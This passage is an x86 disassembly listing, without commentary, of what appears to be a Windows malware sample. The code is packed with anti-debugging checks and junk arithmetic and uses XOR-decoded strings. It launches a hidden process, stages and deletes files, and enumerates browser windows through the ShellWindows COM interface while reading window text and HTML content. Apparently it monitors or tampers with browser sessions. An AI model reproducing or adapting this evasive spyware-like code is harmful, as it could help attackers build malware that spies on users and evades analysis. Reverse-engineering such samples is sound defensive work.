mov edi, [ebp+var_11C]
push edi
push 80000001h
call sub_4015EB
call sub_40C634 ; IsDebuggerPresent
push 33h
push offset byte_44610D
call sub_405254
push 1
push 0
push offset byte_446605
push offset byte_446605
push eax
push 80000001h
call sub_4015EB
mov [ebp+var_109], 0A7h
movzx eax, [ebp+var_109]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_109], al
push 3Bh
push offset byte_4460D1
call sub_405254
push 1
push 0
push offset byte_446605
push offset byte_446605
push eax
push 80000001h
call sub_4015EB
add esp, 68h
pop edi
pop esi
leave
retn
sub_405F79 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4062CD proc near ; CODE XREF: sub_409847+2C6�p
; sub_409847+5E3�p ...
var_3B8 = dword ptr -3B8h
var_3B1 = byte ptr -3B1h
var_3B0 = dword ptr -3B0h
var_3AB = byte ptr -3ABh
var_2A7 = byte ptr -2A7h
var_2A2 = byte ptr -2A2h
var_29F = byte ptr -29Fh
var_29D = byte ptr -29Dh
var_29C = dword ptr -29Ch
var_298 = dword ptr -298h
var_294 = byte ptr -294h
var_290 = byte ptr -290h
var_28D = byte ptr -28Dh
var_285 = byte ptr -285h
var_280 = dword ptr -280h
var_27C = dword ptr -27Ch
var_278 = dword ptr -278h
var_274 = dword ptr -274h
var_270 = word ptr -270h
var_26E = word ptr -26Eh
var_26C = word ptr -26Ch
var_269 = byte ptr -269h
var_268 = dword ptr -268h
var_264 = word ptr -264h
var_261 = byte ptr -261h
var_260 = dword ptr -260h
var_25C = dword ptr -25Ch
var_250 = byte ptr -250h
var_14C = dword ptr -14Ch
var_148 = dword ptr -148h
var_11C = dword ptr -11Ch
var_118 = word ptr -118h
var_104 = byte ptr -104h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
sub esp, 3B8h
push ebx
push esi
push edi
mov [ebp+var_261], 59h
add [ebp+var_261], 14h
and [ebp+var_14C], 0
mov [ebp+var_264], 798Fh
sub [ebp+var_264], 30E0h
xor ebx, ebx
lea edi, [ebp+var_285]
lea esi, aJv_ ; "&JV_"
mov ecx, 5
rep movsb
push offset dword_4412C0
call sub_40C610 ; InterlockedIncrement
mov [ebp+var_274], eax
lea edi, [ebp+var_28D]
lea esi, byte_441327
movsd
movsd
push 10h
push 0
lea eax, [ebp+var_260]
push eax
call sub_40CA00
lea edi, [ebp+var_290]
lea esi, byte_44132F
mov ecx, 3
rep movsb
mov [ebp+var_278], 104h
push 21h
push offset byte_4460AF
call sub_405254
mov [ebp+var_298], eax
push 4
push offset aMxd ; "|MXD"
call sub_405254
lea edi, [ebp+var_294]
push edi
lea edi, [ebp+var_278]
push edi
lea edi, [ebp+var_250]
push edi
push eax
mov edi, [ebp+var_298]
push edi
push 80000002h
call sub_4014BD
add esp, 34h
mov [ebp+var_27C], eax
mov [ebp+var_268], 1431h
sub [ebp+var_268], 2BF6h
or eax, eax
jnz short loc_4063F9
mov [ebp+var_29C], 2D07h
inc [ebp+var_29C]
push [ebp+arg_0]
call sub_40C658 ; LocalFree
lea edi, [ebp+var_2A2]
lea esi, word_441332
mov ecx, 3
rep movsw
xor eax, eax
jmp loc_40689D
; ---------------------------------------------------------------------------
loc_4063F9: ; CODE XREF: sub_4062CD+F7�j
call sub_405F79
mov [ebp+var_269], 2
add [ebp+var_269], 0BCh
push 104h
lea eax, [ebp+var_104]
push eax
lea eax, [ebp+var_250]
push eax
call sub_40C4F0 ; ExpandEnvironmentStringsA
push [ebp+var_274]
push [ebp+arg_18]
push [ebp+arg_14]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_4]
push [ebp+arg_0]
lea eax, [ebp+var_250]
push eax
call sub_405601
add esp, 20h
mov [ebp+var_14C], eax
cmp [ebp+arg_1C], 0
jz short loc_40646F
cmp eax, 0FFFFFFFFh
jz short loc_406469
mov eax, [ebp+arg_1C]
mov edx, [ebp+var_14C]
mov [eax], edx
jmp short loc_40646F
; ---------------------------------------------------------------------------
loc_406469: ; CODE XREF: sub_4062CD+18D�j
mov eax, [ebp+arg_1C]
and dword ptr [eax], 0
loc_40646F: ; CODE XREF: sub_4062CD+188�j
; sub_4062CD+19A�j
cmp [ebp+var_14C], 0
jnz short loc_4064B7
lea edi, [ebp+var_29D]
lea esi, byte_441338
mov ecx, 3
rep movsb
push [ebp+arg_0]
call sub_40C658 ; LocalFree
mov word ptr [ebp+var_29C+2], 3601h
movzx eax, word ptr [ebp+var_29C+2]
mov edx, eax
add edx, eax
mov eax, edx
mov word ptr [ebp+var_29C+2], ax
xor eax, eax
jmp loc_40689D
; ---------------------------------------------------------------------------
loc_4064B7: ; CODE XREF: sub_4062CD+1A9�j
push 0Eh
push offset byte_44609B
call sub_405254
push eax
lea edi, [ebp+var_104]
push edi
call sub_40CA54
lea eax, [ebp+var_250]
push eax
lea eax, [ebp+var_104]
push eax
call sub_40CA54
call sub_40C538 ; RtlGetLastWin32Error
call sub_404527
mov [ebp+var_280], eax
call sub_40C538 ; RtlGetLastWin32Error
push 44h
push 0
lea eax, [ebp+var_148]
push eax
call sub_40CA00
mov [ebp+var_26C], 597Ch
movzx eax, [ebp+var_26C]
imul eax, 641Bh
mov [ebp+var_26C], ax
push 44h
push 0
lea eax, [ebp+var_148]
push eax
call sub_40CA00
add esp, 30h
call sub_40C508 ; GetCurrentProcessId
mov [ebp+var_148], 44h
call sub_40C634 ; IsDebuggerPresent
mov [ebp+var_11C], 1
mov [ebp+var_118], 1
cmp [ebp+var_280], 0
jz short loc_406577
lea eax, [ebp+var_148]
push eax
call sub_4045B7
pop ecx
jmp short loc_406580
; ---------------------------------------------------------------------------
loc_406577: ; CODE XREF: sub_4062CD+299�j
mov [ebp+var_118], 0
loc_406580: ; CODE XREF: sub_4062CD+2A8�j
lea eax, [ebp+var_260]
push eax
lea eax, [ebp+var_148]
push eax
push 0
push 0
push 20h
push 0
push 0
push 0
lea eax, [ebp+var_104]
push eax
push 0
call sub_40C70C ; CreateProcessA
or eax, eax
jz loc_406823
call sub_40C634 ; IsDebuggerPresent
push [ebp+var_25C]
call sub_40C55C ; CloseHandle
push 22h
push offset dword_446078
call sub_405254
push [ebp+var_274]
push offset aMicrosoftCorp ; "MicroSoft-Corp"
push eax
lea edi, [ebp+var_104]
push edi
call sub_40CA30
add esp, 18h
call sub_40C538 ; RtlGetLastWin32Error
mov byte ptr [ebp+var_29C+3], 0
jmp short loc_406651
; ---------------------------------------------------------------------------
loc_4065F5: ; CODE XREF: sub_4062CD+38C�j
lea edi, [ebp+var_29F]
lea esi, aCayc_ ; "CYc_"
mov ecx, 3
rep movsw
push 7
push offset aEijMai ; "eij^MAI"
call sub_405254
add esp, 8
lea edi, [ebp+var_104]
push edi
push eax
call sub_40C784 ; FindWindowA
mov ebx, eax
call sub_40C538 ; RtlGetLastWin32Error
or ebx, ebx
jnz short loc_40665B
call sub_40C508 ; GetCurrentProcessId
mov eax, dword_4412B4
add eax, 3E0h
push eax
call sub_40C6D0 ; Sleep
call sub_40C5A4 ; GetVersion
add byte ptr [ebp+var_29C+3], 1
loc_406651: ; CODE XREF: sub_4062CD+326�j
mov al, byte ptr [ebp+var_29C+3]
cmp al, 0Ah
jb short loc_4065F5
loc_40665B: ; CODE XREF: sub_4062CD+361�j
or ebx, ebx
jz loc_40680C
mov word ptr [ebp+var_29C], 7B09h
sub word ptr [ebp+var_29C], 714Fh
push 0F000h
call sub_40C6D0 ; Sleep
mov [ebp+var_29D], 5Bh
add [ebp+var_29D], 5Ah
push 104h
lea eax, [ebp+var_104]
push eax
push ebx
call sub_40C76C ; GetWindowTextA
mov eax, 0Fh
sub eax, dword_4412B8
push eax
push offset aXOkrecv11 ; "X-okRecv11"
lea eax, [ebp+var_104]
push eax
call sub_401806
add esp, 0Ch
cmp eax, 0FFFFh
jz loc_4067FE
call sub_40C514 ; GetCurrentThreadId
lea edi, [ebp+var_2A7]
lea esi, aIk ; "Ik"
mov ecx, 3
rep movsb
mov dword ptr [ebp-2A4h], 4145h
mov eax, 6B7Ch
mul dword ptr [ebp-2A4h]
mov [ebp+var_3B0], eax
mov [ebp-2A4h], eax
lea eax, [ebp+var_3AB]
push eax
push [ebp+arg_4]
call sub_4053A1
add esp, 8
or eax, eax
jz loc_4067ED
call sub_40C598 ; GetTickCount
push 0
push [ebp+arg_8]
lea eax, [ebp+var_3AB]
push eax
call sub_40C604 ; CopyFileA
lea eax, [ebp+var_14C]
push eax
push [ebp+arg_8]
call sub_401A36
mov [ebp+var_3B8], eax
call sub_40C634 ; IsDebuggerPresent
push [ebp+arg_8]
call sub_40C760 ; DeleteFileA
mov [ebp+var_3B1], 31h
movzx eax, [ebp+var_3B1]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_3B1], al
push offset aHtml ; "<HTML><!--"
call sub_40C73C ; lstrlen
push eax
push offset aHtml ; "<HTML><!--"
push [ebp+var_3B8]
call sub_40CA6C
add esp, 14h
or eax, eax
jnz short loc_4067BB
push offset aHtml ; "<HTML><!--"
call sub_40C73C ; lstrlen
mov edi, [ebp+var_14C]
sub edi, 3Ah
push edi
mov edi, eax
add edi, [ebp+var_3B8]
push edi
push [ebp+arg_8]
call sub_4052EF
add esp, 0Ch
jmp short loc_4067D6
; ---------------------------------------------------------------------------
loc_4067BB: ; CODE XREF: sub_4062CD+4C2�j
mov eax, [ebp+var_14C]
sub eax, 40h
push eax
push [ebp+var_3B8]
push [ebp+arg_8]
call sub_4052EF
add esp, 0Ch
loc_4067D6: ; CODE XREF: sub_4062CD+4EC�j
push [ebp+var_3B8]
call sub_40C658 ; LocalFree
mov [ebp+var_14C], 2
jmp short loc_406844
; ---------------------------------------------------------------------------
loc_4067ED: ; CODE XREF: sub_4062CD+44A�j
call sub_40C634 ; IsDebuggerPresent
mov [ebp+var_14C], 1
jmp short loc_406844
; ---------------------------------------------------------------------------
loc_4067FE: ; CODE XREF: sub_4062CD+3F7�j
call sub_40C5A4 ; GetVersion
and [ebp+var_14C], 0
jmp short loc_406844
; ---------------------------------------------------------------------------
loc_40680C: ; CODE XREF: sub_4062CD+390�j
mov byte ptr [ebp+var_29C+2], 95h
sub byte ptr [ebp+var_29C+2], 0Bh
and [ebp+var_14C], 0
jmp short loc_406844
; ---------------------------------------------------------------------------
loc_406823: ; CODE XREF: sub_4062CD+2DD�j
mov byte ptr [ebp+var_29C+3], 1Dh
movzx eax, byte ptr [ebp+var_29C+3]
mov edx, eax
add edx, eax
mov eax, edx
mov byte ptr [ebp+var_29C+3], al
and [ebp+var_14C], 0
loc_406844: ; CODE XREF: sub_4062CD+51E�j
; sub_4062CD+52F�j ...
lea eax, [ebp+var_250]
push eax
call sub_40C760 ; DeleteFileA
call sub_40C634 ; IsDebuggerPresent
push [ebp+arg_0]
call sub_40C658 ; LocalFree
mov [ebp+var_26E], 769Dh
inc [ebp+var_26E]
push 0
push [ebp+var_260]
call sub_40C6DC ; TerminateProcess
mov [ebp+var_270], 6036h
sub [ebp+var_270], 528Eh
push [ebp+var_260]
call sub_40C55C ; CloseHandle
mov eax, [ebp+var_14C]
loc_40689D: ; CODE XREF: sub_4062CD+127�j
; sub_4062CD+1E5�j
pop edi
pop esi
pop ebx
leave
retn
sub_4062CD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4068A2 proc near ; CODE XREF: sub_406A9A+CB�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push esi
push edi
mov esi, [ebp+arg_4]
mov [ebp+var_4], 315h
push esi
push [ebp+arg_0]
mov eax, dword_44134C
lea eax, ds:41B8A0h[eax]
push eax
call sub_40C9F4
add esp, 0Ch
xor edi, edi
jmp short loc_4068E9
; ---------------------------------------------------------------------------
loc_4068CF: ; CODE XREF: sub_4068A2+49�j
mov eax, dword_44134C
add eax, edi
lea eax, ds:41B8A0h[eax]
movsx edx, byte ptr [eax]
xor edx, 0CAh
mov [eax], dl
inc edi
loc_4068E9: ; CODE XREF: sub_4068A2+2B�j
cmp edi, esi
jl short loc_4068CF
mov eax, dword_44134C
add eax, esi
mov byte ptr ds:dword_41B8A0[eax], 0
mov edi, dword_44134C
inc dword_44134C
mov eax, dword_44134C
lea eax, [eax+esi+1]
mov dword_44134C, eax
cmp eax, 0DD3h
jle short loc_406924
and dword_44134C, 0
loc_406924: ; CODE XREF: sub_4068A2+79�j
lea eax, dword_41B8A0[edi]
pop edi
pop esi
leave
retn
sub_4068A2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40692E proc near ; CODE XREF: sub_406E2B+1A4�p
; sub_406E2B+555�p ...
var_C = dword ptr -0Ch
var_5 = dword ptr -5
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0Ch
push ebx
push esi
push edi
mov ebx, [ebp+arg_4]
mov [ebp+var_1], 0A8h
add [ebp+var_1], 0B3h
push [ebp+arg_0]
call sub_40C748 ; lstrlenW
mov edi, eax
mov eax, dword_44135C
mov [ebp+var_5], eax
push 0
push 0
push 1FFFh
push ebx
push edi
push [ebp+arg_0]
push 0
push 0
call sub_40C718 ; WideCharToMultiByte
mov esi, 6089h
mov eax, 2984h
mul esi
mov [ebp+var_C], eax
mov esi, eax
mov byte ptr [ebx+edi], 0
mov eax, edi
pop edi
pop esi
pop ebx
leave
retn
sub_40692E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406987 proc near ; CODE XREF: sub_4069E2+AB�p
var_2 = word ptr -2
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
mov esi, [ebp+arg_0]
mov [ebp+var_2], 40BBh
inc [ebp+var_2]
cmp dword_441354, 0
jz short loc_4069AF
mov eax, dword_441354
push eax
mov ebx, [eax]
call dword ptr [ebx+8]
loc_4069AF: ; CODE XREF: sub_406987+1B�j
mov edi, 2480h
sub edi, 4C20h
mov eax, [esi+4]
push dword ptr [esi+4]
mov ebx, [eax]
call dword ptr [ebx+8]
call sub_40C514 ; GetCurrentThreadId
mov eax, [esi]
push dword ptr [esi]
mov ebx, [eax]
call dword ptr [ebx+8]
call sub_40BA54
call sub_40C508 ; GetCurrentProcessId
pop edi
pop esi
pop ebx
leave
retn
sub_406987 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4069E2 proc near ; CODE XREF: sub_406E2B+57�p
var_11 = byte ptr -11h
var_1 = byte ptr -1
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 14h
push ebx
push esi
push edi
mov edi, [ebp+arg_0]
call sub_40C634 ; IsDebuggerPresent
mov [ebp+var_1], 0C1h
sub [ebp+var_1], 0FBh
and dword ptr [edi], 0
and dword ptr [edi+4], 0
push 0
call sub_40BA48
call sub_40C538 ; RtlGetLastWin32Error
lea eax, [ebp+var_11]
push eax
push offset a9ba05972F6a811 ; "{9BA05972-F6A8-11CF-A442-00A0C90A8F39}"
call sub_40BA3C
mov esi, eax
call sub_40C574 ; GetProcessHeap
xor ebx, ebx
cmp esi, ebx
setl bl
or ebx, ebx
jnz short loc_406A8C
call sub_40C5A4 ; GetVersion
push edi
push offset dword_446BF4
push 4
push 0
lea eax, [ebp+var_11]
push eax
call sub_40BA30
mov esi, eax
xor ebx, ebx
cmp esi, ebx
setl bl
or ebx, ebx
jnz short loc_406A8C
call sub_40C5A4 ; GetVersion
mov eax, edi
add eax, 4
push eax
push offset dword_446BE4
mov eax, [edi]
push dword ptr [edi]
mov ebx, [eax]
call dword ptr ds:0[ebx]
mov esi, eax
call sub_40C514 ; GetCurrentThreadId
xor ebx, ebx
cmp esi, ebx
setl bl
or ebx, ebx
jnz short loc_406A8C
call sub_40C514 ; GetCurrentThreadId
xor eax, eax
inc eax
jmp short loc_406A95
; ---------------------------------------------------------------------------
loc_406A8C: ; CODE XREF: sub_4069E2+4A�j
; sub_4069E2+6F�j ...
push edi
call sub_406987
pop ecx
xor eax, eax
loc_406A95: ; CODE XREF: sub_4069E2+A8�j
pop edi
pop esi
pop ebx
leave
retn
sub_4069E2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406A9A proc near ; CODE XREF: sub_406E2B+AC�p
var_10054 = dword ptr -10054h
var_10050 = dword ptr -10050h
var_1004C = dword ptr -1004Ch
var_10047 = byte ptr -10047h
var_1003F = byte ptr -1003Fh
var_10039 = byte ptr -10039h
var_10032 = byte ptr -10032h
var_10031 = byte ptr -10031h
var_1002C = dword ptr -1002Ch
var_10028 = byte ptr -10028h
var_29 = byte ptr -29h
var_28 = word ptr -28h
var_20 = dword ptr -20h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_D = byte ptr -0Dh
var_C = dword ptr -0Ch
var_8 = word ptr -8
var_5 = byte ptr -5
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, 10054h
call sub_40C498
push ebx
push esi
push edi
call sub_40C574 ; GetProcessHeap
cmp dword_441358, 0FFFFh
jz short loc_406AC2
and dword_441350, 0
loc_406AC2: ; CODE XREF: sub_406A9A+1F�j
mov [ebp+var_5], 0EDh
movzx eax, [ebp+var_5]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_5], al
mov eax, dword_441350
cmp [ebp+arg_4], eax
jz loc_406D83
lea edi, [ebp+var_10031]
lea esi, a40? ; ":40?"
mov ecx, 5
rep movsb
mov eax, [ebp+arg_4]
mov dword_441350, eax
cmp dword_441354, 0
jz short loc_406B36
call sub_40C574 ; GetProcessHeap
mov eax, dword_441354
push eax
mov esi, [eax]
call dword ptr [esi+8]
mov [ebp+var_1004C], 90Dh
mov eax, [ebp+var_1004C]
mov edx, eax
add edx, eax
mov [ebp+var_1004C], edx
and dword_441354, 0
loc_406B36: ; CODE XREF: sub_406A9A+69�j
push 0FFFFh
lea eax, [ebp+var_10028]
push eax
push [ebp+arg_4]
call sub_40C76C ; GetWindowTextA
mov [ebp+var_8], 77DCh
movzx eax, [ebp+var_8]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_8], ax
push 1Bh
push offset aZgiEEmGdPDpPJe ; "£©ø„¹„¬¾ź¤¾Æø¤Æ¾ź²ŗ¦„øÆø"
call sub_4068A2
mov edi, 0Dh
sub edi, dword_441348
push edi
push eax
lea edi, [ebp+var_10028]
push edi
call sub_401806
add esp, 14h
cmp eax, 0FFFFh
jnz short loc_406BD3
mov word ptr [ebp+var_1004C], 18AFh
movzx eax, word ptr [ebp+var_1004C]
imul eax, 1C81h
mov word ptr [ebp+var_1004C], ax
and dword_441354, 0
mov word ptr [ebp+var_1004C+2], 985h
movzx eax, word ptr [ebp+var_1004C+2]
mov edx, eax
add edx, eax
mov eax, edx
mov word ptr [ebp+var_1004C+2], ax
jmp loc_406D83
; ---------------------------------------------------------------------------
loc_406BD3: ; CODE XREF: sub_406A9A+F1�j
lea eax, [ebp+var_C]
push eax
mov eax, [ebp+arg_0]
mov eax, [eax+4]
push eax
mov edi, [eax]
call dword ptr [edi+1Ch]
mov ebx, eax
mov [ebp+var_D], 1Eh
add [ebp+var_D], 1
cmp [ebp+var_C], 0
jz loc_406D83
mov [ebp+var_14], 6CC8h
mov eax, 4A3Dh
mul [ebp+var_14]
mov [ebp+var_1004C], eax
mov [ebp+var_14], eax
or ebx, ebx
jnz loc_406D83
and [ebp+var_4], 0
cmp dword_441358, 0FFFFh
jz short loc_406C6D
call sub_40C538 ; RtlGetLastWin32Error
inc dword_441358
mov eax, [ebp+var_C]
cmp dword_441358, eax
jbe short loc_406C44
and dword_441358, 0
loc_406C44: ; CODE XREF: sub_406A9A+1A1�j
mov [ebp+var_10050], 5B8Fh
mov eax, 1268h
mul [ebp+var_10050]
mov [ebp+var_10054], eax
mov [ebp+var_10050], eax
mov eax, dword_441358
mov [ebp+var_4], eax
loc_406C6D: ; CODE XREF: sub_406A9A+18B�j
; sub_406A9A+2DC�j
push 0
call sub_40C9B8
pop ecx
call sub_40C634 ; IsDebuggerPresent
mov [ebp+var_28], 2
mov eax, [ebp+var_4]
mov [ebp+var_20], eax
mov dword_441358, eax
lea eax, [ebp+var_18]
push eax
lea esi, [ebp+var_28]
sub esp, 10h
mov edi, esp
mov ecx, 4
rep movsd
mov edi, [ebp+arg_0]
mov edi, [edi+4]
push edi
mov edi, [edi]
call dword ptr [edi+20h]
mov ebx, eax
or ebx, ebx
jnz loc_406D4B
lea edi, [ebp+var_10032]
lea esi, byte_441365
xor ecx, ecx
inc ecx
rep movsb
push offset dword_441354
push offset dword_446C04
mov eax, [ebp+var_18]
push eax
mov edi, [eax]
call dword ptr ds:0[edi]
mov ebx, eax
call sub_40C508 ; GetCurrentProcessId
or ebx, ebx
jnz short loc_406D4B
call sub_40C598 ; GetTickCount
lea eax, [ebp+var_1002C]
push eax
mov eax, dword_441354
push eax
mov edi, [eax]
call dword ptr [edi+94h]
mov ebx, eax
lea edi, [ebp+var_10039]
lea esi, aNDlyo ; "N DLYO"
mov ecx, 7
rep movsb
or ebx, ebx
jnz short loc_406D4B
mov [ebp+var_29], 28h
sub [ebp+var_29], 8Ch
mov dword_441358, 0FFFFh
mov eax, [ebp+arg_4]
cmp [ebp+var_1002C], eax
jz short loc_406D83
lea edi, [ebp+var_1003F]
lea esi, aT2vxo ; "T2vxO"
mov ecx, 3
rep movsw
loc_406D4B: ; CODE XREF: sub_406A9A+214�j
; sub_406A9A+24B�j ...
cmp dword_441354, 0
jz short loc_406D5F
mov eax, dword_441354
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_406D5F: ; CODE XREF: sub_406A9A+2B8�j
lea edi, [ebp+var_10047]
lea esi, aWWavg ; "W'WAV`"
movsd
movsd
inc [ebp+var_4]
mov eax, [ebp+var_C]
cmp [ebp+var_4], eax
jb loc_406C6D
and dword_441354, 0
loc_406D83: ; CODE XREF: sub_406A9A+41�j
; sub_406A9A+134�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_406A9A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406D88 proc near ; CODE XREF: sub_406E2B+5E6�p
; sub_406E2B+62A�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push eax
push esi
push edi
mov esi, [ebp+arg_4]
push esi
push [ebp+arg_0]
mov eax, dword_441384
lea eax, ds:430CF0h[eax]
push eax
call sub_40C9F4
add esp, 0Ch
mov [ebp+var_4], 27Ah
xor edi, edi
jmp short loc_406DD0
; ---------------------------------------------------------------------------
loc_406DB6: ; CODE XREF: sub_406D88+4A�j
mov eax, dword_441384
add eax, edi
lea eax, ds:430CF0h[eax]
movsx edx, byte ptr [eax]
xor edx, 0EDh
mov [eax], dl
inc edi
loc_406DD0: ; CODE XREF: sub_406D88+2C�j
cmp edi, esi
jl short loc_406DB6
mov [ebp+var_8], 200h
mov eax, dword_441384
add eax, esi
mov byte ptr ds:dword_430CF0[eax], 0
xor edi, edi
mov edi, dword_441384
inc dword_441384
mov eax, dword_441384
add eax, 6
add eax, esi
mov dword_441384, eax
add dword_441384, 3
cmp dword_441384, 0E0Fh
jle short loc_406E21
and dword_441384, 0
loc_406E21: ; CODE XREF: sub_406D88+90�j
lea eax, dword_430CF0[edi]
pop edi
pop esi
leave
retn
sub_406D88 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406E2B proc near ; CODE XREF: sub_407F67+56�p
var_63822 = byte ptr -63822h
var_6381C = dword ptr -6381Ch
var_63816 = byte ptr -63816h
var_62818 = dword ptr -62818h
var_62813 = byte ptr -62813h
var_6280E = byte ptr -6280Eh
var_6280D = byte ptr -6280Dh
var_6280C = dword ptr -6280Ch
var_62808 = word ptr -62808h
var_62800 = dword ptr -62800h
var_627F8 = word ptr -627F8h
var_627F0 = dword ptr -627F0h
var_627E8 = dword ptr -627E8h
var_627E4 = dword ptr -627E4h
var_627E0 = word ptr -627E0h
var_627DD = byte ptr -627DDh
var_627DA = byte ptr -627DAh
var_627D3 = byte ptr -627D3h
var_627CC = word ptr -627CCh
var_627CA = word ptr -627CAh
var_627C8 = dword ptr -627C8h
var_627C4 = byte ptr -627C4h
var_627C3 = byte ptr -627C3h
var_627C2 = word ptr -627C2h
var_627C0 = byte ptr -627C0h
var_627BF = byte ptr -627BFh
var_626C0 = dword ptr -626C0h
var_626BC = dword ptr -626BCh
var_626B8 = word ptr -626B8h
var_626B0 = dword ptr -626B0h
var_626A4 = dword ptr -626A4h
var_626A0 = dword ptr -626A0h
var_6269C = dword ptr -6269Ch
var_62698 = dword ptr -62698h
var_62694 = dword ptr -62694h
var_62690 = dword ptr -62690h
var_6268C = dword ptr -6268Ch
var_62687 = byte ptr -62687h
var_62682 = word ptr -62682h
var_6267F = byte ptr -6267Fh
var_526B8 = byte ptr -526B8h
var_526B0 = dword ptr -526B0h
var_526AA = byte ptr -526AAh
var_526A9 = byte ptr -526A9h
var_526A8 = byte ptr -526A8h
var_526A0 = dword ptr -526A0h
var_52696 = byte ptr -52696h
var_52690 = word ptr -52690h
var_52688 = dword ptr -52688h
var_52684 = dword ptr -52684h
var_52680 = dword ptr -52680h
var_5267A = byte ptr -5267Ah
var_52674 = byte ptr -52674h
var_5266F = byte ptr -5266Fh
var_52669 = byte ptr -52669h
var_52668 = byte ptr -52668h
var_52667 = byte ptr -52667h
var_52666 = byte ptr -52666h
var_52663 = word ptr -52663h
var_52661 = byte ptr -52661h
var_5265A = word ptr -5265Ah
var_52658 = dword ptr -52658h
var_52652 = word ptr -52652h
var_5264F = byte ptr -5264Fh
var_52649 = byte ptr -52649h
var_52644 = dword ptr -52644h
var_52640 = dword ptr -52640h
var_5263C = dword ptr -5263Ch
var_52638 = byte ptr -52638h
var_52630 = dword ptr -52630h
var_5262B = byte ptr -5262Bh
var_5262A = word ptr -5262Ah
var_52628 = dword ptr -52628h
var_52622 = word ptr -52622h
var_52620 = dword ptr -52620h
var_5261C = dword ptr -5261Ch
var_52618 = word ptr -52618h
var_52616 = word ptr -52616h
var_52614 = dword ptr -52614h
var_5260F = byte ptr -5260Fh
var_5260E = word ptr -5260Eh
var_5260C = dword ptr -5260Ch
var_52606 = word ptr -52606h
var_52604 = dword ptr -52604h
var_525FE = word ptr -525FEh
var_525FC = dword ptr -525FCh
var_525F8 = dword ptr -525F8h
var_525F4 = dword ptr -525F4h
var_525EE = word ptr -525EEh
var_525EC = dword ptr -525ECh
var_525E8 = dword ptr -525E8h
var_525E4 = dword ptr -525E4h
var_525DF = byte ptr -525DFh
var_524E0 = byte ptr -524E0h
var_524D8 = dword ptr -524D8h
var_524CC = dword ptr -524CCh
var_524C8 = byte ptr -524C8h
var_39E28 = byte ptr -39E28h
var_21788 = word ptr -21788h
var_21786 = word ptr -21786h
var_21784 = dword ptr -21784h
var_2177D = byte ptr -2177Dh
var_1177E = word ptr -1177Eh
var_1177C = word ptr -1177Ch
var_10FAC = dword ptr -10FACh
var_10FA8 = dword ptr -10FA8h
var_10FA4 = dword ptr -10FA4h
var_10001 = byte ptr -10001h
var_2 = word ptr -2
push ebp
mov ebp, esp
mov eax, 63824h
call sub_40C498
push ebx
push esi
push edi
call sub_40C5A4 ; GetVersion
push offset aValue ; "value"
call sub_40BA0C
mov [ebp+var_10FA8], eax
mov eax, dword_441394
mov [ebp+var_52644], eax
push offset aName ; "name"
call sub_40BA0C
mov [ebp+var_10FAC], eax
mov [ebp+var_52616], 569Bh
inc [ebp+var_52616]
lea eax, [ebp+var_52638]
push eax
call sub_4069E2
pop ecx
or eax, eax
jz loc_407F62
call sub_40C574 ; GetProcessHeap
loc_406E95: ; CODE XREF: sub_406E2B+CF�j
; sub_406E2B+F4�j ...
push 0
call sub_40C9B8
mov [ebp+var_52618], 0C8Fh
inc [ebp+var_52618]
call sub_40C7B4 ; GetForegroundWindow
mov [ebp+var_5261C], eax
lea edi, [ebp+var_52649]
lea esi, aOap ; "op*"
mov ecx, 5
rep movsb
push [ebp+var_5261C]
lea eax, [ebp+var_52638]
push eax
call sub_406A9A
add esp, 0Ch
lea edi, [ebp+var_5264F]
lea esi, aAcbls ; "AcBLs"
mov ecx, 3
rep movsw
cmp dword_441354, 0
jz short loc_406E95
mov ax, word_4413A3
mov [ebp+var_52652+1], ax
lea eax, [ebp+var_525F4]
push eax
mov eax, dword_441354
push eax
mov edi, [eax]
call dword ptr [edi+48h]
mov ebx, eax
or ebx, ebx
jnz loc_406E95
mov [ebp+var_52620], 6F23h
mov eax, 38F1h
mul [ebp+var_52620]
mov [ebp+var_52680], eax
mov [ebp+var_52620], eax
lea eax, [ebp+var_525F8]
push eax
push offset dword_446BA4
mov eax, [ebp+var_525F4]
push eax
mov edi, [eax]
call dword ptr ds:0[edi]
mov ebx, eax
mov [ebp+var_525FC], 2AEFh
mov eax, [ebp+var_525FC]
mov edx, eax
add edx, eax
mov [ebp+var_525FC], edx
or ebx, ebx
jnz loc_407F44
lea eax, [ebp+var_5263C]
push eax
mov eax, dword_441354
push eax
mov edi, [eax]
call dword ptr [edi+78h]
mov ebx, eax
call sub_40C634 ; IsDebuggerPresent
or ebx, ebx
jnz loc_407F0E
mov [ebp+var_52622], 0A61h
movzx eax, [ebp+var_52622]
imul eax, 47C9h
mov [ebp+var_52622], ax
push offset byte_41EB90
push [ebp+var_5263C]
call sub_40692E
add esp, 8
mov edi, eax
inc edi
